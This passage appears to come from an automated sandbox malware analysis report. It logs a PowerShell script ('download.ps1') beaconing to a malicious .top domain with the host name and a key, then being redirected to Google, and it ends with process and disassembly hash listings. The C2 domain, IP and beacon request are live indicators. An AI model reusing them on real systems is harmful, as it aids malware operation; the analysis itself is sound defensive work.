                                                                                                    Jan 6, 2025 20:02:06.212627888 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.212639093 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.212666035 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.212697029 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.218864918 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.218875885 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.218946934 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.218975067 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.218983889 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.219023943 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.225282907 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.225296021 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.225306034 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.225344896 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.235361099 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.235372066 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.235416889 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.600836039 CET5390780192.168.2.545.61.136.138
                                                                                                    Jan 6, 2025 20:02:06.600987911 CET5390880192.168.2.5142.250.186.36

                                                                                                    UDP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Jan 6, 2025 20:02:02.704088926 CET5445353192.168.2.51.1.1.1
                                                                                                    Jan 6, 2025 20:02:03.691757917 CET5445353192.168.2.51.1.1.1
                                                                                                    Jan 6, 2025 20:02:03.783796072 CET53544531.1.1.1192.168.2.5
                                                                                                    Jan 6, 2025 20:02:04.335916042 CET53544531.1.1.1192.168.2.5
                                                                                                    Jan 6, 2025 20:02:04.969755888 CET6387053192.168.2.51.1.1.1
                                                                                                    Jan 6, 2025 20:02:04.976602077 CET53638701.1.1.1192.168.2.5

                                                                                                    DNS Queries

                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Jan 6, 2025 20:02:02.704088926 CET192.168.2.51.1.1.10xb467Standard query (0)bfhdkgmmhdbikgj.topA (IP address)IN (0x0001)false
                                                                                                    Jan 6, 2025 20:02:03.691757917 CET192.168.2.51.1.1.10xb467Standard query (0)bfhdkgmmhdbikgj.topA (IP address)IN (0x0001)false
                                                                                                    Jan 6, 2025 20:02:03.790070057 CET192.168.2.51.1.1.10x1Standard query (0)bfhdkgmmhdbikgj.topA (IP address)IN (0x0001)false
                                                                                                    Jan 6, 2025 20:02:04.969755888 CET192.168.2.51.1.1.10x2b27Standard query (0)www.google.comA (IP address)IN (0x0001)false

                                                                                                    DNS Answers

                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Jan 6, 2025 20:02:04.249233961 CET1.1.1.1192.168.2.50x1No error (0)bfhdkgmmhdbikgj.top45.61.136.138A (IP address)IN (0x0001)false
                                                                                                    Jan 6, 2025 20:02:04.335916042 CET1.1.1.1192.168.2.50xb467No error (0)bfhdkgmmhdbikgj.top45.61.136.138A (IP address)IN (0x0001)false
                                                                                                    Jan 6, 2025 20:02:04.976602077 CET1.1.1.1192.168.2.50x2b27No error (0)www.google.com142.250.186.36A (IP address)IN (0x0001)false

                                                                                                    HTTP Request Dependency Graph

                                                                                                    • bfhdkgmmhdbikgj.top
                                                                                                    • www.google.com

                                                                                                    HTTP Packets

                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.55390745.61.136.138802800C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 6, 2025 20:02:04.270276070 CET216OUTGET /f7qe6pa3v1htr.php?id=user-PC&key=63266493739&s=527 HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                    Host: bfhdkgmmhdbikgj.top
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 6, 2025 20:02:04.968200922 CET166INHTTP/1.1 302 Found
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Mon, 06 Jan 2025 19:02:04 GMT
                                                                                                    Content-Length: 0
                                                                                                    Connection: keep-alive
                                                                                                    Location: http://www.google.com


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.553908142.250.186.36802800C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 6, 2025 20:02:04.987445116 CET159OUTGET / HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                    Host: www.google.com
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 6, 2025 20:02:06.031631947 CET1236INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 06 Jan 2025 19:02:05 GMT
                                                                                                    Expires: -1
                                                                                                    Cache-Control: private, max-age=0
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-dOqGI8EeMr2eEXmd9UgJsw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                    Server: gws
                                                                                                    X-XSS-Protection: 0
                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                    Set-Cookie: AEC=AZ6Zc-XCeZMZ0wiwM-u4y6mizNCA-OFAqZFLEM3_P9Xm5IDBSeOoP-bmHA; expires=Sat, 05-Jul-2025 19:02:05 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                    Set-Cookie: NID=520=kP0ldbNiJE2hk-yxozgIPkbD-JOEuhK9XujbOrWiTWupVyEy07KjLtIYlq6jyQTm8MkmSe-xTaefY4PyvHh7dMfLRtY5zvQVB5Kj8v43b7In6Ozs8llvaUohgQ-pGzU9Xh5XYk3XpagtGkjOBnNazqLX6RVKH-heTO6dmO-UJaRNrqUa3RZuFSJvKhbql5UKqP7C-3MNeQ; expires=Tue, 08-Jul-2025 19:02:05 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                    Accept-Ranges: none
                                                                                                    Vary: Accept-Encoding
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Data Raw: 34 38 35 65 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c
                                                                                                    Data Ascii: 485e<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images,
                                                                                                    Jan 6, 2025 20:02:06.031656981 CET224INData Raw: 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79
                                                                                                    Data Ascii: videos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type
                                                                                                    Jan 6, 2025 20:02:06.031675100 CET1236INData Raw: 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61 72 64 5f 63 6f 6c 6f 72 5f 31 32 38 64 70 2e 70 6e 67 22 20 69 74 65
                                                                                                    Data Ascii: "><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>Google</title><script nonce="dOqGI8EeMr2eEXmd9UgJsw">(function(){var _g={kEI:'rSh8Z_yeKt_e1e8P_Jy8uQ0',kEXPI:'0,18167,184579,3497546,1092,30
                                                                                                    Jan 6, 2025 20:02:06.031692982 CET1236INData Raw: 30 2c 35 30 36 2c 32 35 36 2c 32 30 34 2c 31 31 35 2c 31 35 32 2c 33 36 32 2c 36 38 35 2c 32 2c 37 34 32 2c 32 2c 35 30 2c 36 33 2c 31 33 37 2c 35 30 2c 32 2c 34 37 37 2c 31 39 33 2c 36 31 2c 33 33 2c 31 30 39 2c 32 35 36 2c 33 34 36 2c 37 30 34
                                                                                                    Data Ascii: 0,506,256,204,115,152,362,685,2,742,2,50,63,137,50,2,477,193,61,33,109,256,346,704,94,362,63,140,2,288,339,139,119,222,1116,150,3,1060,101,1388,1021,14,92,2300,144,225,1951,21347207,37198,18,3484,866,3209,18,2010,48,154,554,1774,8,2065,3,1202,
                                                                                                    Jan 6, 2025 20:02:06.031704903 CET1236INData Raw: 67 6c 65 2e 67 65 74 45 49 3d 6e 3b 67 6f 6f 67 6c 65 2e 67 65 74 4c 45 49 3d 70 3b 67 6f 6f 67 6c 65 2e 6d 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                    Data Ascii: gle.getEI=n;google.getLEI=p;google.ml=function(){return null};google.log=function(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};goo
                                                                                                    Jan 6, 2025 20:02:06.031716108 CET480INData Raw: 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 61 3b 61 3a 7b 66 6f 72 28 61 3d 62 2e 74 61 72 67 65 74 3b 61 26 26 61 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74
                                                                                                    Data Ascii: stener("click",function(b){var a;a:{for(a=b.target;a&&a!==document.documentElement;a=a.parentElement)if(a.tagName==="A"){a=a.getAttribute("data-nohref")==="1";break a}a=!1}a&&b.preventDefault()},!0);}).call(this);</script><style>#gb{font:13px/
                                                                                                    Jan 6, 2025 20:02:06.031945944 CET1236INData Raw: 74 79 3a 68 69 64 64 65 6e 3b 7a 2d 69 6e 64 65 78 3a 39 39 38 3b 72 69 67 68 74 3a 30 7d 2e 67 62 74 6f 20 23 67 62 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 7d 23 67 62 78 33 2c 23 67 62 78 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f
                                                                                                    Data Ascii: ty:hidden;z-index:998;right:0}.gbto #gbs{background:#fff}#gbx3,#gbx4{background-color:#2d2d2d;background-image:none;_background-image:none;background-position:0 -138px;background-repeat:repeat-x;border-bottom:1px solid #000;font-size:24px;heig
                                                                                                    Jan 6, 2025 20:02:06.031959057 CET1236INData Raw: 2a 6c 65 66 74 3a 2d 35 70 78 3b 2a 72 69 67 68 74 3a 35 70 78 3b 2a 62 6f 74 74 6f 6d 3a 34 70 78 3b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c
                                                                                                    Data Ascii: *left:-5px;*right:5px;*bottom:4px;-ms-filter:"progid:DXImageTransform.Microsoft.Blur(pixelradius=5)";opacity:1\0/;top:-4px\0/;left:-6px\0/;right:5px\0/;bottom:4px\0/}.gbma{position:relative;top:-1px;border-style:solid dashed dashed;border-colo
                                                                                                    Jan 6, 2025 20:02:06.031974077 CET1236INData Raw: 63 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 70 78 7d 2e 67 62 7a 30 6c 20 2e 67 62 74 73 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 74
                                                                                                    Data Ascii: c;padding-bottom:1px;padding-top:2px}.gbz0l .gbts{color:#fff;font-weight:bold}.gbtsa{padding-right:9px}#gbz .gbzt,#gbz .gbgt,#gbg .gbgt{color:#ccc!important}.gbtb2{display:block;border-top:2px solid transparent}.gbto .gbzt .gbtb2,.gbto .gbgt .
                                                                                                    Jan 6, 2025 20:02:06.031989098 CET1236INData Raw: 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 34 34 70 78 20 2d 31 30 31 70 78 7d 23 67 62 6d 70 69 64 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 30 7d 23 67 62 6d 70 69 2c 23 67 62 6d 70 69 64 7b 62 6f 72 64 65 72 3a 6e 6f 6e
                                                                                                    Data Ascii: nd-position:-44px -101px}#gbmpid{background-position:0 0}#gbmpi,#gbmpid{border:none;display:inline-block;height:48px;width:48px}#gbmpiw{display:inline-block;line-height:9px;padding-left:20px;margin-top:10px;position:relative}#gbmpi,#gbmpid,#gb
                                                                                                    Jan 6, 2025 20:02:06.036590099 CET1236INData Raw: 65 64 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 7d 2e 67 62 6d 6c 62 2d 68 76 72 2c 2e 67 62 6d 6c 62 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65
                                                                                                    Data Ascii: ed{line-height:27px}.gbmlb-hvr,.gbmlb:focus{outline:none;text-decoration:underline !important}.gbmlbw{color:#ccc;margin:0 10px}.gbmt{padding:0 20px}.gbmt:hover,.gbmt:focus{background:#eee;cursor:pointer;outline:0 solid black;text-decoration:no


                                                                                                    Statistics

                                                                                                    CPU Usage

                                                                                                    Click to jump to process

                                                                                                    Memory Usage

                                                                                                    Click to jump to process

                                                                                                    High Level Behavior Distribution

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Behavior

                                                                                                    Click to jump to process

                                                                                                    System Behavior

                                                                                                    General

                                                                                                    Target ID:0
                                                                                                    Start time:14:01:55
                                                                                                    Start date:06/01/2025
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                                                                    Imagebase:0x7ff7be880000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:1
                                                                                                    Start time:14:01:55
                                                                                                    Start date:06/01/2025
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Disassembly

                                                                                                    Reset < >

                                                                                                      Executed Functions

                                                                                                      Function 00007FF848E77DD6 Relevance: .5, Instructions: 477COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2193027592.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7647c347bb4e18f2f8e46b18f2a76c9de5a28f6991e11e9281794133f99ce944
                                                                                                      • Instruction ID: 9c756b07b5d3711d6ebda7fdadeec15ffc7c3dc5c80b5731fb812207b1083cd6
                                                                                                      • Opcode Fuzzy Hash: 7647c347bb4e18f2f8e46b18f2a76c9de5a28f6991e11e9281794133f99ce944
                                                                                                      • Instruction Fuzzy Hash: 17F1A33090CA8D8FEBA8EF28C8557E977D1FF55350F04426EE84DC7291DB3499458B85
                                                                                                      Function 00007FF848E78B82 Relevance: .5, Instructions: 462COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2193027592.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c9fbae639fa4a9f455ad41c2cfce358312a69a711fe38676367c06b2d301d881
                                                                                                      • Instruction ID: 0d53d218cb03c8c7d2b291f6cf8a21bac28ea1af72c090a76415877bd9731b64
                                                                                                      • Opcode Fuzzy Hash: c9fbae639fa4a9f455ad41c2cfce358312a69a711fe38676367c06b2d301d881
                                                                                                      • Instruction Fuzzy Hash: 58E1C330A0CA4D8FEBA8EF28C8557E977D1FF64350F04426AD84DC7691DF74A9418B86
                                                                                                      Function 00007FF8490D4AA4 Relevance: 1.5, Instructions: 1487COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2196185837.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff8490d0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7dd3eaa8344a2403e3e1a1bc02c15256dc9b0e0360886a2f3aa2f01fb0072f8d
                                                                                                      • Instruction ID: 853a8cbd9b797a39192d2fee10a1ffcdce359726110b91f6719ecf57d6dedcdb
                                                                                                      • Opcode Fuzzy Hash: 7dd3eaa8344a2403e3e1a1bc02c15256dc9b0e0360886a2f3aa2f01fb0072f8d
                                                                                                      • Instruction Fuzzy Hash: 96B2DE31E1DA8A8FEBA9EB288855678B7E1FF65740F1841B9D00DC72C7DE28EC458741
                                                                                                      Function 00007FF8490D4B65 Relevance: .7, Instructions: 657COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2196185837.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff8490d0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a7e2d9d96f844f528b3f1cc1b1a110c5910e1c98c6ca35d794a9f0670757b4a6
                                                                                                      • Instruction ID: 1deaa17b8d1a2202fc2f3ae677979c4d3b7d3a4ebbe98beeb5ac05606d7ee2c6
                                                                                                      • Opcode Fuzzy Hash: a7e2d9d96f844f528b3f1cc1b1a110c5910e1c98c6ca35d794a9f0670757b4a6
                                                                                                      • Instruction Fuzzy Hash: 3F22E131E1DA8A8FEBA8EB288855674B7E1FF55740F1842BAD00DC72D7DE28EC458741
                                                                                                      Function 00007FF848E78796 Relevance: .3, Instructions: 336COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2193027592.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6c48ff9546716f915ea3fd44dfb7bb1ab58df35a6f40055600219fdc3a761afa
                                                                                                      • Instruction ID: 515ca4fd9896597bc5e541e674ad523e5f18bf856f9b07830beef0c455719f52
                                                                                                      • Opcode Fuzzy Hash: 6c48ff9546716f915ea3fd44dfb7bb1ab58df35a6f40055600219fdc3a761afa
                                                                                                      • Instruction Fuzzy Hash: 34B1B43050CA8D8FEBA9EF28C8557E93BD1FF65350F04426AE84DC7292CB3499458B86
                                                                                                      Function 00007FF848D4E620 Relevance: .1, Instructions: 126COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2192537825.00007FF848D4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D4D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff848d4d000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 57ddf7de04017075bead0a593d8f19b1f3930f5027bfd3ca499d25f1000408a2
                                                                                                      • Instruction ID: d99069eb9e61f36d2600966733d059b70913252617dab7e5803fc509384c59e8
                                                                                                      • Opcode Fuzzy Hash: 57ddf7de04017075bead0a593d8f19b1f3930f5027bfd3ca499d25f1000408a2
                                                                                                      • Instruction Fuzzy Hash: D641277080EBC45FE7569B399845A523FF0EF56360F1505EFD088CB1A3D625A84AC7A2
                                                                                                      Function 00007FF848E723AB Relevance: .1, Instructions: 122COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2193027592.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c1d4f25b0bd9942e99c169269d100087d7ec8bc81aa44f692998c67ab80a81e9
                                                                                                      • Instruction ID: c7d5bdc98d6c35fe92f29434dccc8a2117e62fe5e8f3f1018c9316c0e03d50e4
                                                                                                      • Opcode Fuzzy Hash: c1d4f25b0bd9942e99c169269d100087d7ec8bc81aa44f692998c67ab80a81e9
                                                                                                      • Instruction Fuzzy Hash: 1C31C33091CB4C9FDB1CDB5C980A6A97BE0FB99711F00422FE449C3252DB70A8558BC2
                                                                                                      Function 00007FF848E72C38 Relevance: .1, Instructions: 102COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2193027592.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a206d96360fada1a9bd6d800f885d90b8b6114d0669f3071cdcb79e7b4f828d0
                                                                                                      • Instruction ID: 3fa779134685848f9b58a20e17560d1b7fb2247973661b597b650177a8a3be33
                                                                                                      • Opcode Fuzzy Hash: a206d96360fada1a9bd6d800f885d90b8b6114d0669f3071cdcb79e7b4f828d0
                                                                                                      • Instruction Fuzzy Hash: 8921263190CA4C5FEB58DFAC984A7E97BE0EBA6321F04426FD049C3152DB70A446CB91
                                                                                                      Function 00007FF848E78294 Relevance: .1, Instructions: 92COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2193027592.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 023fcd22a7e26e0eafa4ea51f9094a08dcc3b70782f379130582b9a7902747f0
                                                                                                      • Instruction ID: 62143b770a760dd1af91ce5fc7d52d15592632c1eabb624c88db58b2510eb997
                                                                                                      • Opcode Fuzzy Hash: 023fcd22a7e26e0eafa4ea51f9094a08dcc3b70782f379130582b9a7902747f0
                                                                                                      • Instruction Fuzzy Hash: A931FA3091D65E9EFBB8EF18CC1ABF93290FF55395F400139D40D86092DB786986CA19
                                                                                                      Function 00007FF848E65395 Relevance: .0, Instructions: 49COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2193027592.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: bc5dcbd5ede653ca980044ffa226be88404f5321d5c1ea188cd2df254a297467
                                                                                                      • Instruction ID: ce3759fb69cb9675903cdcfeac7ca3a16e33904497efbad72dd362146c575c91
                                                                                                      • Opcode Fuzzy Hash: bc5dcbd5ede653ca980044ffa226be88404f5321d5c1ea188cd2df254a297467
                                                                                                      • Instruction Fuzzy Hash: D101A73010CB0C4FDB44EF0CE451AAAB3E0FB95360F10052DE58AC3655D732E881CB45
                                                                                                      Function 00007FF8491121CD Relevance: .0, Instructions: 40COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2196534896.00007FF849110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849110000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff849110000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 46f19ebe6e5b765c07e98f6f5b84689e77a02f6841d93d5d99f829e49998536d
                                                                                                      • Instruction ID: 0af094bb2ed7c24288871916e433fd0a4f14f784221d792f23a7a97a2aa1cbef
                                                                                                      • Opcode Fuzzy Hash: 46f19ebe6e5b765c07e98f6f5b84689e77a02f6841d93d5d99f829e49998536d
                                                                                                      • Instruction Fuzzy Hash: 9AF0F032A0C5858FEB68FB0CE4429A877E0FF09360B1400F6E05DC7067EA2AAC41CB54
                                                                                                      Function 00007FF848E72A80 Relevance: .0, Instructions: 36COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2193027592.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f580d3671a86f797e9a570fc758c8742c026cb6fa959d7c735b32cb222065814
                                                                                                      • Instruction ID: 81a346757dd33b7fb2196aae4b1f8e75c59b5247ed5fd027ba44bd4c9b76ea02
                                                                                                      • Opcode Fuzzy Hash: f580d3671a86f797e9a570fc758c8742c026cb6fa959d7c735b32cb222065814
                                                                                                      • Instruction Fuzzy Hash: 49F0B43180C68E8FDB1AEF3888195E57FA0FF26251F05029BE459C71A2EB749854CB82
                                                                                                      Function 00007FF849111C9B Relevance: .0, Instructions: 36COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
